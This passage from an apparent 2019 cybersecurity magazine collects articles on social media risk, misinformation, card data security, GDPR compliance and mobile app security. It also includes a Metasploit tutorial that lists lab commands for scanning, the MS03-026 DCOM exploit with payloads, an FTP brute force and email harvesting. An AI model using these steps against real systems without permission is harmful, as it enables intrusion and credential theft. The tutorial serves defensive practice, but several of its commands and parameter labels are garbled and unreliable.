communicating updates and highlighting the good work done by many. But organizations often forget<br />

that competitors can also collect intelligence on them through their own social media. Businesses often<br />

take advantage of competitor information wherever they can, from insights into valuable intellectual<br />

property to information about key customers or even internal personnel or corporate financial information.<br />

New information, such the announcement of a product launch, can seem exciting to a company and to<br />

its investors; but to a competitor, it may be helpful in planning its own announcements and competing<br />

product launch.<br />

While organizations generally use social media to push out positive information, it has to be prepared to<br />

respond to negative information as well. Picture a scenario where a CEO is speaking to key stakeholders,<br />

while a disgruntled shareholder simultaneously is tweeting a long list of complaints about the CEO. An<br />

organization has to be disciplined and cautious about when and if it should respond to negative<br />

comments, even though such events can occur in a matter of minutes. Having a solid communications<br />

plan and a bit of thick skin is important to ensure the organization does not overreact and make matters<br />

worse.<br />

Employee personal social media use. Security leaders see careless or unaware employees as the<br />

number one threat to digital security, according to a 2017 survey of key security executives from 1,200<br />

companies by consultancy EY. 4 There is a fine line between free speech and irresponsible<br />

representations. Publicly available social media profiles are helpful to hackers looking to build a social<br />

engineering profile for the purpose of compromising key employees. Individual use of social media in an<br />

irresponsible manner can also subject the organization to public scrutiny and reputational impact. Having<br />

a responsible social media policy and training around its data protection and appropriate communications<br />

is helpful in navigating this sometimes-complicated issue.<br />

Today’s organizations bear a heavy burden to protect sensitive information and are spending billions in<br />

cybersecurity tools and mitigations. Specific regulatory requirements including GDPR and CCPA attempt<br />

to mandate specific efforts to protect sensitive personal information. Even if an organization is compliant<br />

with the most stringent regulations, it can still put itself at risk by its own business decisions, and that is<br />

something that should keep management up at night.<br />

4<br />

20 th Global Information Security Survey 2017-18. EY. 21 <strong>November</strong> 2017. https://consulting.ey.com/cybersecurityregained/<br />

92


About the Author<br />

Stephanie Douglas is Senior Managing Director at Guidepost<br />

Solutions. She focuses on sensitive internal investigations,<br />

white collar crime investigations, building corporate<br />

compliance programs, holistic corporate security programs,<br />

and proactively educating executives about crisis<br />

management and insider threats. She is sought after for her<br />

invaluable insight and judgment and is sensitive to the needs<br />

of business, working with corporations to identify risks, think<br />

through sensible and cost-efficient mitigations, and engage<br />

leadership with making long-term and productive corporate<br />

changes. Stephanie can be reached online at<br />

sdouglas@guidepostsolutions.com and at<br />

https://www.guidepostsolutions.com/<br />

93


Avoiding Misinformation for Content Moderators<br />

By Sarah Katz, <strong>Cyber</strong> Security Specialist<br />

Provided the controversy surrounding foreign fake news that allegedly influenced the 2016 presidential<br />

elections in countries such as France and the United States, concern over the ubiquity of this<br />

misinformation has skyrocketed in the past two years. In particular, many social media platforms, such<br />

as Facebook and Twitter, have received major backlash for failing to effectively protect their users by not<br />

monitoring fake news more closely.<br />

94


Global Information Sharing<br />

CBS News<br />

Over the past two years, social media giants have placed particular emphasis on protecting users from<br />

fake news as well as graphic violence and pornography.<br />

However, the well-known social media platforms, such as Facebook, Instagram and Twitter, sport billions<br />

of users worldwide. Therefore, the practices employed toward fake news mitigation must account for the<br />

emergence of said news in a multitude of different languages. The trouble is, there are hardly enough<br />

content moderators to spot all of this unsavory material.<br />

Unfortunately for the 2016 election era and potentially its upcoming 2020 counterpart, social media<br />

content moderation’s prioritization of extreme violence and sex leaves ample opportunity for<br />

misinformation to slip through the cracks – especially when said information appears within seemingly<br />

legitimate news stories and oftentimes in languages that the majority of moderators do not read.<br />

For Content Reviewers<br />

After verifying sources for any known blacklisted websites, a content moderator should take the next step<br />

of ensuring they can read the language in which the material appears. Even in regard to reviewing content<br />

in a language unknown to moderators, content moderation policy should implement the practice of<br />

checking for buzzwords in article titles using Google Translate.<br />

Due to the clickbait nature of the following buzzwords, content moderators should search the text in<br />

95


question for such terms in a variety of languages – namely, Chinese and Russian - so that a foreignlanguage<br />

article will not pose such a moderation barrier. 5 For languages written in different character<br />

systems, it is recommended that reviewers take note of how they appear and use their notes as a<br />

reference point when perusing news story headlines in shared articles.<br />

How to spot Misinformation<br />

As with determining the legitimacy of any webpage, moderators are encouraged to check the news<br />

source websites with the following precautionary checklist in mind:<br />

1) Pop-ups: Do multiple pop-ups and ad banners appear when trying to navigate the webpage?<br />

2) HTTP vs. HTTPS: In the address bar at the top of the webpage, does the far left read http or https?<br />

Tip: While not set in stone, https websites tend to be more secure, as their data is encrypted.<br />

3) URL Redirect: Does the article link seem to redirect to multiple different URLs before the actual<br />

destination page loads? Two optimal free tools for verifying the safety of URLs are VirusTotal and<br />

Urlquery.<br />

4) Hyperlink Match: Does the link in the address bar match the name of the website you are trying to<br />

reach?<br />

5) Typosquat: Examine the link for a typosquatted domain or URL. For example, consider facbook.com,<br />

rather than the proper facebook.com.<br />

When links become quite dangerous is when they lead to a login portal that prompts you to enter your<br />

email or social media login credentials, after which point the hacker will have access to your actual email<br />

or social media account. Once again, VirusTotal and Urlquery are invaluable free resources to safely test<br />

suspect domains and URLs before opening them on one’s machine.<br />

5<br />

Christopher, Nilesh. “Facebook's Fake News Clean-up Hits Language Barrier.” The Economic<br />

Times, 13 Apr.<br />

2018, economictimes.indiatimes.com/tech/internet/facebooks-fake-news-clean-up-hits-language<br />

barrier/articleshow/63741507.cms.<br />

96


Finally, when presented with a foreign-language news article while browsing either social media or the<br />

Internet in general, Google Translate must be used with a grain of salt.<br />

Once more, content reviewers should always cross-reference any search terms with articles from reliable<br />

news sources in their native language to ensure as best as possible that nothing is taken out of context.<br />

As certain idioms and slang can be easily lost in translation, one should never rely on Internet translation<br />

for more than one search term at a time.<br />

Conclusion: Head above Water in <strong>Cyber</strong>space<br />

The good news is, thwarting these risks does not always require a technical pedigree – simply close<br />

attention to detail and, most importantly, understanding what one is looking at and for.<br />

<strong>Cyber</strong>space is a tricky terrain. New breeds of hackers and threats are constantly evolving and many flock<br />

to social media platforms to spread fake news and malicious links. The aforementioned tips remain just<br />

a few pointers in a vast array of ever-changing techniques needed to ensure that both users and content<br />

moderators alike stay safe and properly informed.<br />

About the Author<br />

Sarah Katz is a UC Berkeley alumna, cyber security specialist and awardwinning<br />

fiction author. She earned a nomination for the 2018 Women in IT<br />

Security Champion of the Year Award for being one of a select few former<br />

Facebook content moderators willing to speak on the issue of user privacy on<br />

social media. Updates on Katz’s work in security and writing can be found at<br />

www.facebook.com/authorsarahkatz on Facebook and @authorsarahkatz on<br />

Twitter.<br />

97


How to Keep Your Customer’s Credit Card Information Safe<br />

Strong cybersecurity goes without question<br />

By John Shin, Managing Direction, RSI Security<br />

Protecting customer data is closely related to delivering a satisfying customer experience.<br />

An enjoyable meal in a beautiful restaurant actually isn’t very enjoyable at all if you catch the waiter writing<br />

down your credit card number. Customers spending money on a product usually don’t think about what<br />

might or might not happen to the data they emit about themselves online. From our physical<br />

demographics to our geographic location, whether broadcast implicitly or explicitly, social media and<br />

other app functionality gathers and stores useful data points about our lives.<br />

Small details gathered in the present can coalesce down the road to form a much fuller picture of who<br />

we are. That’s why the most effective businesses take cybersecurity seriously, especially when it comes<br />

to keeping customer data under proper lock and key. Data breaches of an e-commerce store’s credit and<br />

debit transaction information can not only be expensive for the exposed victims, but the breached<br />

business often finds itself on the line to pay for potential damages. These incidents aren’t only hard on<br />

the pocket book, but hard on a company’s public perception at the same time.<br />

While every internet-using adult in <strong>2019</strong> should have some solid cybersecurity fundamentals (not using<br />

the same password everywhere, for example), it’s rather easy for business organizations that consist of<br />

many smart people to miss the boat on cybersecurity. They might make the mistake of not considering<br />

98


cybersecurity threats seriously enough (“We don’t need to worry about that!”), or the organization may<br />

be of sufficient size that everyone thinks cybersecurity is someone else’s job.<br />

This ignorance or shortsightedness means that companies regardless of size or expertise alike have had<br />

to deal with the expensive, embarrassing ramifications, from the smallest startups to the largest global<br />

corporations, companies at every stage in the game have had to deal with the expensive, embarrassing<br />

ramifications of losing customer data like credit card numbers. But pairing education with action can right<br />

the ship.<br />

Companies implementing compliant hardware and practices will enjoy significantly increased confidence<br />

and certainty operating on an internet with bad guys on it. Discerning customers asking these companies<br />

about their data processing standards will learn that they’ve taken care and consideration to handle<br />

customer data mindfully.<br />

Use a private network or cloud-based system.<br />

This is where the rubber meets the road on taking certain base-level steps that many cybersecurity<br />

newbies simply don’t know to implement. How is data handled on your network? What kind of network is<br />

it exactly? Does everyone connect to share workspace using a virtual private network? Do you depend<br />

on a cloud-based system’s off-the-shelf solution?<br />

Encrypt the data so it’s unreadable to cybercriminals.<br />

Just like you might install a strong lock on the front door in a tough neighborhood, you should take steps<br />

to obscure the state of your network data as it pertains to your business. Encryption makes it easy for<br />

you to read and access your own data, but prohibitively difficult for other people to do the same.<br />

Breaking encryption is a much more complex matter than simply gaining illegal access to a private<br />

computer system. You can probably use a feature in a product you already depend on to enable a high<br />

degree of encryption that renders stolen information unreadable.<br />

Ensure Payment Card Industry (PCI) security compliance across your network and card payment<br />

devices.<br />

With major credit card companies processing thousands of transactions per second, you don’t actually<br />

want to be a credit card cybersecurity trailblazer. There are reliable, well-documented guidelines already<br />

99


out there on how to establish certain cybersecurity thresholds. If your business handles credit card<br />

transactions, for example, then you need to chase PCI compliance.<br />

It is probably easier to achieve PCI compliance than you think. A PCI audit, whether a casual selfassessment<br />

or formal, paid audit conducted by a third-party assessor, will provide you the actionable<br />

feedback you need to become compliant.<br />

In many instances, you may lean on the PCI compliance already afforded by certain products on the<br />

market. It’s just a matter of combining approved hardware and approved software to work together.<br />

Educate the staff on cybersecurity and compliance.<br />

Companies become what they focus on. Make niche topics about data management and security<br />

practices part of the everyday work conversation if you want it to be part of your employees’ thought<br />

process. As newer workers learn what colleagues focus on several rungs up the ladder, this eventually<br />

becomes their focus as well.<br />

Make it a point of culture that your company talks openly about cybersecurity issues, especially as they<br />

pertain to the company’s successful continued operation. This kind of rubbing people’s minds in it in the<br />

long term will build an awareness and working knowledge of the subject matter that will surely serve them<br />

whether or not their jobs are connected to handling data.<br />

There’s no better pushback against fraud than an educated staff. Make sure your people know their stuff.<br />

If you process cards in person, go for EMV readers instead of Magstripe.<br />

EMV payments are those that process a computer chip stored to one end of a credit card in order to<br />

execute, and they are a far more secure and valid way to pay than by conventional swipe of a magnetic<br />

strip. (Such casual swiping is exactly what scammers depend on in order to get a successful “skim.”)<br />

EMV payment technology makes it much harder for bad guys to steal cardholder information. These “chip<br />

cards” contain an embedded microchip and are automatically authenticated with a personal identification<br />

number entered during a transaction. This category of card payment may add time to the total transaction<br />

process, but they operate on a paradigm significantly secure than magstripe.<br />

100


There are other tactics available for companies specifically seeking to improve their credit card<br />

cybersecurity. They might truncate card data in their records to the point that transactions could be<br />

sufficiently identifiable for customer service purposes without retaining enough information to be a liability<br />

(like complete credit card numbers instead of portions).<br />

While the road to bulletproof cybersecurity is long and can be especially complex, depending on the<br />

industry an organization operates within, but it’s always a good idea to be invested in and up-to-date on<br />

the state of your cybersecurity. Moving information around online already enables wonderful things for<br />

today’s consumers, but the underlying cybersecurity involved in doing so should be a point of pride, not<br />

something for a cost-cutting company to overlook.<br />

If the ideal customer experience is the question here, then strong cybersecurity goes without question.<br />

How can a company hope to serve a customer if it can’t even keep its payment processing operations<br />

PCI compliant?<br />

About the Author<br />

My Name is John Shin and I am the managing director at RSI Security. He<br />

has 18 years of leadership, management and Information Technology<br />

experience. He is a Certified Information Systems Security Professional, CISM,<br />

and Project Management Professional (PMP). He is the principal author on<br />

multiple Internet privacy and security technology papers such as the Dominant<br />

<strong>Cyber</strong> Offensive Engagement and Supporting Technology and<br />

Reconnaissance & Data Exfiltration for U.S. Air Force Research Laboratory.<br />

Mr. Shin has 18 years of leadership, management and Information Technology<br />

experience. His area of expertise is IT security and technology management. He was responsible for<br />

external customer information systems as well as the global infrastructure operations at Abraxas<br />

Corporation, a risk mitigation technology company solely focused on the National Security Community.<br />

Mr. Shin also worked in several management positions for Genoptix Inc. (Nasdaq: GXDX) in<br />

IT/Bioinformatic division. During his tenure at SunGard, Mr. Shin operated as an operations engineer<br />

responsible for mission-critical Infrastructure and ISO-compliance system processes.<br />

John can be reached online at https://www.linkedin.com/in/john-s-504a02140/ and at our company<br />

website https://rsisecurity.com/.<br />

101


10 Best Tips for Using Metasploit to Harden Your Network<br />

By Tim Keary, Copywriter, Comparitech<br />

How do you know if your network is safe? <strong>Cyber</strong>crime is an everyday threat to companies. There is one<br />

hacking attack every 39 seconds. Some have turned to antivirus solutions or vulnerability scanners to<br />

stay protected, but these tools aren't enough. Now, you need penetration testing, as well.<br />

Penetration testing enables you to step into the shoes of an attacker and test your network for<br />

vulnerabilities. By getting there first, you can fix the issue before an attacker exploits it. Metasploit is one<br />

of the top penetration testing tools for simulating attacks. Here are 10 top tips for using Metasploit to<br />

harden your network:<br />

1. Run a discovery scan<br />

Many hackers will go on a reconnaissance effort to gather information on the target before launching an<br />

attack. They collect on the devices you're using, including the type of operating system. The information<br />

gathered is then used later on to find vulnerabilities to break into the network.<br />

Metasploit can be used to run a discovery scan, a combination of a ping scan, port scan, OS/version<br />

detection, and a data import. After completing a scan, you will have a list of IPs with information on the<br />

services running on the machine.<br />

102


You can run a Discovery Scan in Metasploit through the command prompt (which uses NMAP<br />

commands!). In this example, we're going to scan a metasploitable machine. A metasploitable device is<br />

a virtual machine with lots of vulnerabilities.<br />

To run a Discovery Scan, follow the instructions below:<br />

To begin, start the metasploitable machine you want to attack and a Windows Server 2003 machine in<br />

metasploitable. Enter the following command (with the machine IP): net addr: IP 192.168.1.101<br />

Next, start Metasploit. Enter the following command to scan in the specific IP range (in this example we’re<br />

using Kali Linux): msf > nmap -sn 192.168.1.0/24<br />

To find the OS of one of the systems listed enter the following command with the IP address you want to<br />

attack: Nmap -sV-O -T4 192.168.1.101<br />

At the bottom of the output, you will be able to see the OS the machine is running.<br />

2. Use the Help command to find a list of commands<br />

Knowing what commands you have at your disposal is advantageous when using Metasploit. While you<br />

can look online for tutorials to learn new commands, you can also use the Help command to view a list<br />

in the Terminal. To view a list of commands, enter the following command:<br />

msf > help<br />

The screen will then show a list of commands with a description. Basic commands like search, use, back<br />

help, info, and exit will help you to make your way around. Once you become more familiar with<br />

Metasploit, you can start experimenting with more advanced commands and running payloads!<br />

3. Run a vulnerability scan<br />

When trying to break into a network, an attacker is looking for a specific vulnerability to exploit. A<br />

vulnerability is an entire point that enables an attacker to gain access to a network without authorization.<br />

Running a vulnerability scan will highlight these vulnerabilities before an attacker finds them so you can<br />

remedy the issue.<br />

You can run vulnerability scans with Metasploit. The commercial version of Metasploit uses Nexpose to<br />

run a scan.<br />

First, you need to add then Nexpose console to the Metasploit user interface. You can do this by going<br />

to Administration > Global Settings > Expose Consoles > Configure a Nexpose Console<br />

103


Next, enter the IP of the server, port number, user name, and password. Press Enable.<br />

Click Nexpose and add the IP address of the network or host you want to scan.<br />

Select a Scan template to start the scan<br />

Go to Analysis > Host to view the scan results.<br />

4. Import data from a vulnerability scanner<br />

If you’re using Metasploit, then the chances are you will be using other cybersecurity tools like<br />

vulnerability scanners. Metasploit allows you to import scan data from other vulnerability scanning tools<br />

for you to examine entry points.<br />

You can import scan data from third-party vulnerability scanners like Nessus, Core, and Impact. These<br />

tools show you the weaknesses in your defenses that attackers will try to exploit.<br />

To import data:<br />

Complete a scan in NMAP<br />

Save the scan results in XML format on your desktop<br />

Open Metasploit and enter the following command: msf > db_import “path of xml file”<br />

After completing the import, the prompt will generate a Successfully imported message<br />

5. Use task chains to schedule scans!<br />

In Metasploit Pro (the paid version of Metasploit), there is a feature called Task Chains that allows you<br />

to schedule tasks and complete them automatically. You can use this feature to automatically run scans<br />

so that you don’t have to do it manually.<br />

Available tasks include; SCAN, IMPORT, MEXPOSE, BRUTEFORCE, EXPLOIT, MODULE RUN,<br />

COLLECT EVIDENCE, CLEANUP, REPORT, and WEB SCAN. To schedule a scan, do the following:<br />

Go to Tasks > Chains > New Task Chain.<br />

Enter a Task Chain Name for the task<br />

Click the + icon under Task Chain Name<br />

Select SCAN from the list of task types<br />

104


When the task configuration bullet points come up, click on the Schedule Now button<br />

When the schedule table comes up select how often you want to run the task (Once, Hourly, Daily,<br />

Weekly, Monthly)<br />

Click the Save button to save the task<br />

6. Validate vulnerabilities<br />

Whenever you complete a vulnerability scan, you will have discovered the entry points an attacker could<br />

exploit. If there are a lot of vulnerabilities, it can be difficult and time-consuming to go through the list and<br />

solve each problem one-by-one. To help make things easier, Metasploit provides a feature called<br />

Vulnerability Validation Wizard.<br />

The Vulnerability Validation Wizard ranks vulnerabilities in a list based on their risk to your network. Here<br />

you can prioritize your response and deal with the greatest risks first.<br />

To use the Vulnerability Validation Wizard follow the instructions:<br />

Open Metasploit Pro Web Console > Project > Vulnerability Validation<br />

When the vulnerability validation page comes up, enter a Project Name and a Description of the project.<br />

Press Start<br />

Click on Pull from Nexpose and check the Import existing Nexpose vulnerability data option<br />

Click the Tag tab and check the Automatically Tag by OS option<br />

Click the Exploit tab, check the Clean up sessions when done option under Sessions<br />

Click on the Generate Report tab, select the format you want to use for your report, and the sections<br />

you want to use.<br />

Press Start<br />

Once the Validation Wizard comes up, press the Push Validations button at the top right of the page<br />

You can view the results of the tested vulnerabilities by going clicking on Home > Project Name ><br />

Vulnerabilities. Exploited vulnerabilities will be marked Exploited.<br />

105


7. Use exploits to break into a device<br />

After scoping out vulnerabilities and validating them, you are ready to break into a device. To gain access<br />

to a device, you can use an exploit, a script designed for compromising a machine. In this example, we're<br />

going to try and exploit FTP:<br />

To begin, enter the following command: msf > use “exploit path”<br />

Enter the show options command to display the parameters you need to configure to run the exploit: msf<br />

> show options. RHOST and RPORT will be listed as required. RHOST is the target IP, and RPORT is<br />

the target port.<br />

To run the exploit, you will have to set a target IP address and port. Enter the following command:<br />

msf > set RHOST 192.168.1.101<br />

msf > set RPORT 21<br />

Use the run command: msf > run<br />

If a new session starts, then you will have gained access to the system.<br />

8. Use payloads to interact with the compromised system<br />

Payload is another word for a script that an attacker uses to interact with a compromised system.<br />

Attackers will use a payload to upload and execute malicious files onto the victim's system. There are<br />

many different kinds of payloads, and the kind you use depends on the type of vulnerability you intend to<br />

exploit.<br />

Attackers will use a payload that matches an exploit they found during an earlier vulnerability can. For<br />

example, if an attacker detects that you’re running a Windows Server 2003 machine, then they could use<br />

the DCOM MS03-026 vulnerability to attack you.<br />

To use a payload, follow the instructions below:<br />

Run a search command to look for an exploit or module that is effective at exploiting this vulnerability (in<br />

this example, we search for the DCOM vulnerability). Use the exploit with the best rank: msf > search<br />

dcom<br />

Now search for a list of available payloads with the following command: msf exploit (ms03_026_dcom)<br />

> show payloads<br />

106


You will see a list of Compatible Payloads ranked. You want to choose on that allows you to Upload /<br />

Execute files or one marked VNC Server (the latter lets you inject a VNC server remotely). Set the<br />

payload you want to use: set PAYLOAD payloads /path<br />

Now Set the LHOST (attacker IP), LPORT (attackers port), RPORT (victim IP), and RHOST (victim port).<br />

It should look something like this:<br />

msf exploit (ms03_026_dcom) > set LHOST 192.168.1.101<br />

msf exploit (ms03_026_dcom) > set LPORT 23524<br />

msf exploit (ms03_026_dcom)>set RPORT 135<br />

msf exploit (ms03_026_dcom)>set RHOAST 192.168.1.102<br />

Enter the following command to start a new session: msf exploit (ms03_026_dcom) > exploit You<br />

can now interact with the machine through the payload’s settings.<br />

9. Launch a brute force attack<br />

If an attacker has time to hack into your network, then they might try a brute force attack. In a brute force<br />

attack, a hacker tries all possible combinations of characters to gain access to a system and its login<br />

credentials. You can use Metasploit to simulate a brute force attack.<br />

With Metasploit, you can launch brute force attacks against the metasploitable device in a range of ways,<br />

including through FTP, Telnet, and SSH. The medium you use depends on the type of service the system<br />

is running. In this section, we're going to use FTP to attack the metasploitable device.<br />

Create an auxiliary (small script) dictionary list at the root of your Kali machine to break into the<br />

metasploitable device.<br />

In this example we will use the auxiliary/scanner/ftp/ftp_login auxiliary to launch the attack: msf > use<br />

auxiliary/scanner/ftp/ftp_login<br />

Now set the path of the file that includes the dictionary by entering the following command: msf<br />

auxiliary(ftp_login) > set PASS_FILE /root/pass.txt<br />

Then select the target IP : msf auxiliary(ftp_login) > set RHOST 192.168.1.101<br />

Now enter the run command: msf auxiliary(ftp_login) > run. If the attack has been successful, a session<br />

will launch. If it isn't, you will have failed to access the login credentials.<br />

107


10. How to Obtain Email Account Information<br />

Another risk factor that companies have to mitigate is the theft of account data. <strong>Cyber</strong>criminals are always<br />

on the lookout for email accounts to target and gain access to a network before launching an attack. You<br />

can use Metasploit to obtain email account information just like an attacker would.<br />

We can collect emails with the search_email collector module:<br />

Load the module by entering the following command: msf > use auxiliary/gather/search_email_collector<br />

Now use the show options command to view the module options: msf > show options<br />

Set a domain to collect data on: msd > set DOMAIN (Note that Google, Bing, and Yahoo<br />

email accounts will be searched for by default). You will then see a list of email addresses that have been<br />

“located.”<br />

Test Your <strong>Defense</strong>s Before <strong>Cyber</strong> Criminals Do!<br />

Putting your network under pressure with a penetration testing tool like Metasploit enables you to discover<br />

new ways to improve your defenses. Periodically addressing vulnerabilities will help to minimize your<br />

exposure and keep your network available.<br />

Don’t be afraid to hack into the Metasploitable machine to develop your skills. Just remember that once<br />

you’re ready to try live devices, you need to obtain written permission from the owner first!<br />

About the Author<br />

Tim Keary. Since 2017 Tim has been a full-time tech copywriter. Tim writes<br />

extensively on net admin topics helping businesses and entrepreneurs to keep<br />

their data protected.<br />

Our company website https://www.comparitech.com/<br />

108


How Organizations Can Best Avoid GDPR Fines through<br />

Continuous Compliance<br />

By Fouad Khalil, VP of Compliance at SecurityScorecard<br />

Since it came into force in May 2018, the EU’s GDPR has made many businesses nervous. This is hardly<br />

surprising given the recent high-profile cases that has seen the likes of British Airways and Marriott<br />

International being fined millions of pounds for non-compliance with the regulation.<br />

There is also the perception that implementing the necessary changes to comply with the GDPR will be<br />

expensive and disruptive to the running of the business. But this does not have to be the case. In fact,<br />

complying with the GDPR can improve business processes and customer engagement, as well as<br />

making the organisation’s IT network more secure. But to achieve this, organisations cannot simply install<br />

the required infrastructure and then forget about it, they need continuous compliance to ensure that they<br />

are always meeting the requirements of the GDPR.<br />

What is the GDPR?<br />

The General Data Protection Regulation protects the personal data and privacy of all citizens and<br />

residents of EU member states. This applies to any country that handles the data of users from the EU.<br />

Under the GDPR, personally identifiable information (PII) is defined as any data relating to any living<br />

person that can be used to directly or indirectly identify them. This could be name, location data, online<br />

identifiers, bank account numbers, tax numbers and so on. If an organisation is in doubt about whether<br />

the data it holds is personal or not, the failsafe position is to protect it.<br />

109


Despite the view of some that the GDPR presents a minefield of regulatory requirements that could at<br />

any minute blow up in their face, it has actually greatly improved organisations’ chances of complying<br />

with data protection laws across Europe. Before the GDPR, there were different data protection rules for<br />

each member state of the EU, meaning that businesses working across borders often had a complicated<br />

task ensuring they complied with local laws. The GDPR has helped clear this up, so that not only do EU<br />

citizens know their rights, but it is also easier for businesses to collect and use data from other EU states.<br />

A key principle of the GDPR is data security, confidentiality and integrity, part of which is that<br />

organisations must only keep the minimum amount of data necessary to their business needs.<br />

Dangers of not complying<br />

Organisations that do not comply with the GDPR risk a large fine of either four percent of their global<br />

annual turnover or 20 million euros, whichever is the greater. Regardless of these fines, just to have your<br />

name associated with a breach is bad for business and the losses are likely to be much worse.<br />

Other impacts could involve the costs of defending lawsuits, updating infrastructure and security<br />

measures, along with having to potentially pay contractors or staff overtime to get these issues resolved.<br />

Undoubtedly, the most difficult task facing any company in breach of the GDPR would be to repair its<br />

reputation as they have to try to persuade customers, investors and regulators that the situation has<br />

improved and the organisation can be trusted with data.<br />

There is also the reality that much of the compliance with GDPR is rooted in having high quality security<br />

and privacy processes in place. If these are absent, then an organisation has a higher probability of<br />

becoming victim of a cyber attack, with data necessary to the survival of the business at risk of being<br />

compromised.<br />

Therefore, achieving and maintaining compliance with the GDPR is essential for any business wishing to<br />

avoid these risks.<br />

Knowing what to address<br />

When it comes to complying with GDPR, knowledge is king. For instance, to effectively protect the<br />

personal data it holds, an organisation must know what and where this is. Therefore, identifying and<br />

classifying all personal data through enterprise wide-data mapping is essential.<br />

An organisation needs to know what risks there are to the security of its data in order to mitigate them<br />

and show it is proactively addressing any identified concerns. As such, organisations need to use tools<br />

that can scan for vulnerabilities and record remediation efforts. Aside from the obvious benefits of<br />

knowing when and where to update security and having confirmation that it has been done, having this<br />

information will satisfy auditors. If an audit discovers a potential weakness and risk to data being<br />

compromised due to a network security flaw, it will require verification that it is being remediated and<br />

there are adequate controls in place. Tangible evidence such as log files is important here.<br />

110


Alongside this, an organisation must conduct regular Data Protection Impact Assessments (DPIA), ideally<br />

at least once a year. The assessments look at all the data connected to a particular project and makes<br />

sure that all the risks are assessed. If an organisation is meeting its security obligations these risks should<br />

be minimal as there should be the necessary processes and procedures in place to minimise potential<br />

threats. Conducting data mapping before starting a DPIA is highly recommended as it will allow for the<br />

identification of all the data assets in question, including their location and how they are being used.<br />

To make sure that an organisation remains compliant it should consider automating continuous control<br />

monitoring. For example, take the task of the continuous addition of assets to the system, which all need<br />

to be checked and monitored in order to ensure compliance. By automating these typically time and<br />

labour-intensive tasks, it helps to reduce the amount of human error associated with manual processes.<br />

Securing the network<br />

Having a regular patching schedule is one of the most basic cyber security elements an organisation can<br />

implement. Many hackers exploit vulnerabilities that have not already been addressed by released<br />

patches. The patching of operating systems, software and hardware, indicates the ongoing monitoring<br />

and remediation necessary for compliance with the GDPR.<br />

Firms must apply common controls such as web application, endpoint and network security. Network<br />

security controls are critical for preventing the risk of data being stolen. Before these controls are<br />

implemented or drastically changed, the first course of action is to understand the security set up and<br />

scope of the weaknesses.<br />

When an organisation builds applications or implements changes, it must follow a security by design<br />

approach, where risk mitigation is a major consideration from the beginning of the process. Continuous<br />

compliance means ensuring security controls are implemented in the organisation’s day-to-day work.<br />

This minimises the risk of application security flaws that could let a threat actor into a network.<br />

Not only should thought be given to internal security, but also to that of third-party businesses with which<br />

the organisation is connected. An organisation can and will be held responsible for any breach of data it<br />

holds, even if they come via a weakness in the cyber defences of a third party, such as a supplier,<br />

contractor or partner. Knowing what these risks are and making the third party address them, for instance<br />

as part of a contractual agreement, can mitigate the danger of being hacked via “the backdoor”.<br />

Organisational changes<br />

Adhering to the GDPR is more than just about implementing robust security solutions. A well thought out<br />

GDPR program should be considered as an enterprise-wide process improvement initiative, introducing<br />

a new way of doing business and handling data.<br />

A mature compliance programme requires policies and procedures that create formal organisational<br />

controls that are mapped to the GDPR’s articles. Organisations need to establish governance about who<br />

111


is responsible for what processes, data and so on. In the event of a breach there must be a clear reporting<br />

process in place so that the appropriate authority can be notified without delay.<br />

Also, the creation of awareness programmes will inform staff of their responsibilities in regard to data<br />

protection and how to keep the organisation’s network and assets secure.<br />

A good starting point for organisations needing to implement a privacy compliance framework to ensure<br />

their data processing adheres to the GDPR, is to work towards achieving ISO/IEC 27001:2013<br />

accreditation.<br />

Embracing GDPR<br />

Rather than seeing GDPR as a threat, businesses should see it as an opportunity. Continuous<br />

compliance will not only help ensure the organisation stays on the right side of the regulators but could<br />

also have the benefit of improving business processes, reducing costs, and preventing costly cyberattacks.<br />

However, to achieve this, organisations need the right policies and procedures in place, combined with<br />

technology that is able to automate the mitigation, detection and recording of risks.<br />

About the Author<br />

https://securityscorecard.com/<br />

Fouad Khalil is the VP of Compliance at SecurityScorecard.He is<br />

responsible for compliance programs, auditor education and alignment<br />

with best practices. With experience in the technology space, SDLC, IT,<br />

program management and most recently IT Security and Compliance<br />

management, Khalil’s career path has provided him with keen insights<br />

in the areas of network, system and database administration, software<br />

programming and much more.For two decades, Khalil has focused on<br />

data security and compliance—an industry expert in IT, NIST, Internal<br />

Controls, GDPR, SOX, PCI DSS, HIPAA and HITECH. Khalil holds a<br />

BS in EECE from Marquette University and CISA and ITIL. Fouad can<br />

be reached online at @fkhalil65 and at our company website<br />

112


Here’s How You Can Secure Your App from <strong>Cyber</strong> Attacks<br />

By Twinkle<br />

Do you know how many people own a smartphone?<br />

Well, you'll be shocked to know that as per the research estimate the total number of mobile device users<br />

is likely to cross the mark of 5 billion by the end of <strong>2019</strong>. Yes, that's a huge number that can't be ignored<br />

under any circumstances and that includes cybersecurity too!<br />

There are a significant number of app developers and app owners who don't consider security to be a<br />

vital factor while building a mobile application. According to a research report by Gartner, it was revealed<br />

that around 75 percent of the mobile apps are not able to make it through the basic security tests.<br />

Today, we as users are addicted to our smartphones and rely on mobile applications to get our day-today<br />

activities done such as ordering food online, instant shopping, online banking and much more. Due<br />

to this, the risk of falling victim to one of the cyber-attacks is quite high.<br />

113


Effective Ways to Protect Your Mobile Apps<br />

That’s why in this article on mobile app security, we will be sharing some of the most essential<br />

cybersecurity tips on how you can secure your mobile apps from cyber attacks.<br />

1. App Wrapping<br />

The term app wrapping can be defined as a methodology that basically segments a mobile application<br />

from the rest of the mobile device by capturing it in a secure environment.<br />

Here, the app developers will automatically get the option of app wrapping if they are using the MDM<br />

provider. All you need to do is set a couple of parameters and once that is done, your application won't<br />

be requiring any additional coding for the process of segmentation.<br />

2. Enhanced Authorization<br />

Without having strong user authentication, your mobile app won't be able to stay secure for long. App<br />

developers need to strengthen the authorization for users in their applications if they want their app to<br />

not only survive but also thrive in the market.<br />

A basic 'Who are you?' can help app developers in securing their applications against online malware<br />

and viruses. For an advanced level, user authentication must include various aspects such as session<br />

management, the privacy of a user, the online identity and the security features of a device.<br />

For this purpose, there are many technologies available in the market, some of the best being the OAuth<br />

2.0 authorization framework and the OpenID Connect protocol.<br />

3. Securing the APIs<br />

Another way to secure your mobile app is by applying security to the APIs that are being used in their<br />

app development process. As an API is an extremely beneficial tool, it plays an important role in<br />

managing all the data of the app along with the business logic.<br />

For APIs, app developers should include an app-level authentication like SSL with 256-bit encryption,<br />

this will ensure that user validation is done every time a service is used by someone.<br />

4. Implementing the ATS<br />

ATS also known as App Transport Security, can come in handy for securing mobile apps if implemented<br />

correctly by app developers. In other words, app developers can apply ATS to prevent the app from a<br />

114


potential cyber-attack. The purpose of the ATS here is to ensure a secure connection between the app<br />

